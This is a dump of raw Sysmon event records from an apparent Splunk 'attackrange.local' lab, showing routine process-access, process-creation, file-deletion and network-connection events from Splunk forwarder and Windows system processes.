07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.238{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.239{0C1E0330-F3C8-60EB-5779-00000000D001}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047363Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:25.937{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A25811EA5D943F5F6C332E7A4772AC,SHA256=99143DB4293EF959447DA7E6133F96C561247FD33C1B76ED6FF1FF532759E609,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806857Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.754{0C1E0330-F3C9-60EB-5979-00000000D001}15488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000806856Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:24.002{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-28122-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000806855Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.613{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.598{0C1E0330-F3C9-60EB-5979-00000000D001}1548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA6F08FCA467E7DF2FBE19F428623EF9,SHA256=98E9725350076A0E7897024DDAA6F9A3AB2B4D10A076655352BB27218242CA14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:25.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6423D47DA0DD9DEAD78CCF4BD5BF2B7,SHA256=916354ED5C160319356B1DF2EFD639E6CE8D026AFDD3DF0E64173B0B56CE3CB1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047362Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:16.787{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50968-false10.0.1.12-8000- 23542300x80000000000000001047369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:26.955{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51D4DFE4A0A62860FFA97E2D1E551196,SHA256=E450E3F967D1CA36A2405A4AEF59C024D7172D3DBD77955042664129DD55F3F2,IMPHASH=00000000000000000000000000000000falsetrue 